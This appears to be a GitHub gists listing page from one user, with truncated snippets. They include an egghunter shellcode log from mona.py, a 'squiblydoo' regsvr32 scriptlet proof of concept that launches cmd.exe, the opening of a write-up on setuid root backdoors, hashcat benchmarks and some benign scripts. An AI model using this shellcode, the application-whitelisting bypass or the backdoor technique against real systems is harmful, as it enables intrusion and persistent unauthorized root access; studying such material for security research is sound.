@dave5623
dave5623 / ddclient.conf_googledomains_raspi.txt
Created July 1, 2016 02:41
Sample ddclient.conf for raspi when using googledomains
# https://www.jgomez.net/google-dynamic-dns-with-raspberry-pi/
protocol=dyndns2
#use=if, if=wlan0
use=web, web=checkip.dyndns.org
ssl=yes
server=domains.google.com
login=googleloginhere
password='googlepasswordhere'
subdomain.domain.tld
Log data
Address Message
0BADF00D [+] Command used:
0BADF00D !mona egg
0BADF00D [+] Egg set to w00t
0BADF00D [+] Generating traditional 32bit egghunter code
0BADF00D [+] Preparing output file 'egghunter.txt'
0BADF00D - (Re)setting logfile egghunter.txt
0BADF00D [+] Egghunter (32 bytes):
"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
dave5623 / Sysinfo.sh
Created April 29, 2016 15:09 — forked from jgamblin/Sysinfo.sh
A Bash Script To Get System Information For OSX.
#!/bin/bash
# You Will need to install istats
# gem install istats
echo && echo ----------------------System Information:--------------------- &&
/bin/echo -n "Uptime: " && uptime | awk '{print $3}'
echo
/bin/echo -n "CPU Usage: " && top -l 1 | awk '/CPU usage/ {print $3}'
/bin/echo -n "CPU Temp: " && istats | grep CPU\ temp | awk '{print $3}'
/bin/echo -n "FAN Speed: " && istats | grep Fan\ 0\ speed: | awk '{print $4,$5}'
dave5623 / Backdoor-Minimalist.sct
Created April 22, 2016 14:52
Execute Remote Scripts Via regsvr32.exe - Referred to As "squiblydoo" Please use this reference...
<?XML version="1.0"?>
<scriptlet>
<registration
progid="Empire"
classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
<!-- Proof Of Concept - Casey Smith @subTee -->
<script language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("cmd.exe");
dave5623 / sled.py
Created April 21, 2016 20:47
Python ASCII Sled Generator
# Build the escaped byte sequence \x00 through \xFF as literal text
string = ''
for i in range(0, 256):
    string += "\\x" + "{:02X}".format(i)
print(string)
dave5623 / setuid-root-backdoor.md
Created February 15, 2016 19:02 — forked from dergachev/setuid-root-backdoor.md
How to use setuid to install a root backdoor.

Why You Can't Un-Root a Compromised Machine

Let's say somebody temporarily got root access to your system, whether because you "temporarily" gave them sudo rights, they guessed your password, or any other way. Even if you can disable their original method of accessing root, there's an infinite number of dirty tricks they can use to easily get it back in the future.

While the obvious tricks are easy to spot, like adding an entry to /root/.ssh/authorized_keys or creating a new user, potentially via running malware or via a cron job, I recently came across a rather subtle one that doesn't require changing any code, but instead exploits a standard feature of the Linux user permissions system called setuid to subtly allow them to execute a root shell from any user account on the system (including www-data, which you might not even know is compromised).

If the "setuid bit" (or flag, or permission mode) is set for an executable, the operating system will run not as the cur

dave5623 / Amazon EC2 NVIDIA GRID K520 oclHashcat Benchmarks
Created May 20, 2015 05:18
Amazon EC2 NVIDIA GRID K520 oclHashcat Benchmarks
cudaHashcat v1.36 starting in benchmark-mode...
Device #1: GRID K520, 4095MB, 797Mhz, 8MCU
Hashtype: MD4
Workload: 1024 loops, 256 accel
Speed.GPU.#1.: 3989.1 MH/s
Hashtype: MD5
dave5623 / Kali VM Hashcat Benchmark
Created May 20, 2015 02:12
Kali VM Hashcat Benchmark
Initializing hashcat v0.49 with 1 threads and 32mb segment-size...
Device...........: Intel(R) Core(TM) i7 CPU M 620 @ 2.67GHz
Instruction set..: x86_32
Number of threads: 1
Hash type: MD4
Speed/sec: 6.77M words
Hash type: MD5
[0x12 0x68 0xAA 0x10 0x01]
#include <Wire.h>
int toggle = 0;
void setup()
{
Wire.begin();
}
void loop()